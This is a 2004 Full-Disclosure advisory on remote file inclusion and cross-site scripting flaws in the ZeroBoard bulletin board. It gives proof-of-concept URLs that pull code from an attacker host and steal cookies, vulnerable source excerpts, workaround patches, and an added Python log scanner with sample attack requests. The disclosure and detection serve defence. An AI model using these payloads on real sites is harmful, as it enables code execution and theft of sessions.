[Full-Disclosure] STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

From: SSR Team (advisory_at_stgsecurity.com)
Date: 12/24/04

    To: <vuln@secunia.com>, <news@securiteam.com>, <bugs@securitytracker.com>, <full-disclosure@lists.netsys.com>, <staff@packetstormsecurity.com>
    Date: Fri, 24 Dec 2004 09:38:51 +0900
    
    

    STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
    scripting vulnerabilities in ZeroBoard

    Revision 1.2
    Date Published: 2004-12-20 (KST)
    Last Update: 2004-12-24
    Disclosed by SSR Team (advisory@stgsecurity.com)

    Summary
    =======
    ZeroBoard is one of the most widely used web BBS applications in Korea.
    However, input validation flaws allow remote attackers to run arbitrary
    commands with the privileges of the HTTPD process, which typically runs as
    the nobody user.

    Vulnerability Class
    ===================
    Implementation Error: Input validation flaw

    Impact
    ======
    High: arbitrary command execution.

    Affected Products
    =================
    ZeroBoard 4.1pl4 and prior

    Vendor Status: NOT FIXED
    ========================
    2004-11-20 Vulnerabilities found.
    2004-11-20 1st vendor contact; no reply.
    2004-11-22 2nd vendor contact; no reply.
    2004-12-13 STG Security, Inc. customer notified.
    2004-12-24 Official release.

    Details
    =======
    Vulnerability 1 : PHP source injection vulnerability
    ------------------------------------
    - Proof of concept
    http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

    - Environment
    PHP 5.0.x
    php.ini : register_globals = On

    - Description
    As of PHP 5.0.0, file_exists() accepts URL wrappers, as explained at
    http://www.php.net/manual/en/function.file-exists.php. With register_globals
    enabled, the _zb_path parameter of outlogin.php therefore passes the
    file_exists() check even when it points at a remote host, and the
    following include loads code from that host.

    - Part of vulnerable source, outlogin.php.
    ----
    // check that this is a ZeroBoard directory
    if(!file_exists($_zb_path."lib.php")) {
      echo "제로보드 디렉토리가 아닙니다";
      return;
    }

    // read _head.php
    @include $_zb_path."_head.php";

    }
    ----

    Vulnerability 2 : PHP source injection vulnerability
    ------------------------------------
    - Proof of concept
    http://[victim]/include/write.php?dir=http://[attacker]/

    - Environment
    php.ini: register_globals = On

    - Reason
    Uninitialized $dir variable in include/write.php

    - Part of vulnerable source, include/write.php
    ----
    include $dir."/write.php";
    ----

    Vulnerability 3 : Cross-site scripting vulnerability
    --------------------------------------
    - Proof of concept
    http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</script>

    - Reason
    check_user_id.php does not validate or encode the value of user_id before
    echoing it back to the browser.

    - Part of vulnerable source, check_user_id.php
    ----
    $user_id = trim($user_id);
    ... (omitted) ...
    if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다";
    else echo"$user_id 는 사용하실수 있습니다";
    ... (omitted) ...
    ----
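    The three request patterns above can be spotted in web server logs. The following
    Python script is an added example, not part of the advisory: it scans Apache
    combined-format access log lines for the outlogin.php, include/write.php and
    check_user_id.php requests described here; the log lines and the IP addresses in
    them are constructed, and the finding labels are assumed names.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample of Apache combined-format access log lines (not real data).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Dec/2004:09:38:51 +0900] "GET /bbs/zboard.php?id=free HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.7 - - [24/Dec/2004:09:39:02 +0900] "GET /bbs/outlogin.php?_zb_path=ftp%3A%2F%2F192.0.2.10%2Fpub%2F HTTP/1.1" 200 312 "-" "curl/7.10"
10.0.0.7 - - [24/Dec/2004:09:39:15 +0900] "GET /bbs/include/write.php?dir=http://192.0.2.10/ HTTP/1.1" 200 200 "-" "curl/7.10"
10.0.0.9 - - [24/Dec/2004:09:40:00 +0900] "GET /bbs/check_user_id.php?user_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 150 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Dec/2004:09:40:30 +0900] "GET /bbs/check_user_id.php?user_id=jeremy HTTP/1.1" 200 90 "-" "Mozilla/4.0"
10.0.0.5 - - [24/Dec/2004:09:41:00 +0900] "GET /bbs/outlogin.php?_zb_path=./ HTTP/1.1" 200 312 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script name -> (parameter, predicate on the decoded value, finding label).
# Vuln 1 and 2 are remote includes, so a URL scheme ("://") in the path parameter is
# the indicator the advisory's own workaround keys on; vuln 3 is reflected markup.
RULES = {
    "outlogin.php": ("_zb_path", lambda v: "://" in v, "SSA-20041220-16 vuln1: remote path in _zb_path"),
    "include/write.php": ("dir", lambda v: "://" in v, "SSA-20041220-16 vuln2: remote path in dir"),
    "check_user_id.php": ("user_id", lambda v: "<" in v or ">" in v, "SSA-20041220-16 vuln3: markup in user_id"),
}

def decode_param(value):
    """Decode repeatedly so double-encoded values (e.g. %253A) are still caught."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def scan_line(line):
    """Return a finding dict for one log line, or None if it matches no rule."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)
    for script, (param, is_bad, label) in RULES.items():
        if not parts.path.endswith("/" + script):
            continue
        for raw in params.get(param, []):
            value = decode_param(raw)
            if is_bad(value):
                return {"ip": m.group("ip"), "time": m.group("ts"), "finding": label, "value": value}
    return None

def scan_log(text):
    """Scan a whole log text and return the list of findings in file order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]
```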

    Workaround
    ==========
    Until official patches for these vulnerabilities are available, modify the
    vulnerable sources as recommended below.

    Vulnerability 1: As of zboard 4.1pl4
    ----------------------------
    Insert the following code at line 59 of outlogin.php:

    if(eregi(":\/\/",$_zb_path)) $_zb_path="";

    Vulnerability 2: As of zboard 4.1pl4
    ----------------------------
    Insert the following code at line 15 of include/write.php:

    if(eregi(":\/\/",$dir)) $dir="";

    Vulnerability 3: As of zboard 4.1pl4
    ----------------------------
    Insert the following code at line 3 of check_user_id.php:

    $user_id = htmlspecialchars(trim($user_id));

    Credits
    =======
    Jeremy Bae at STG Security
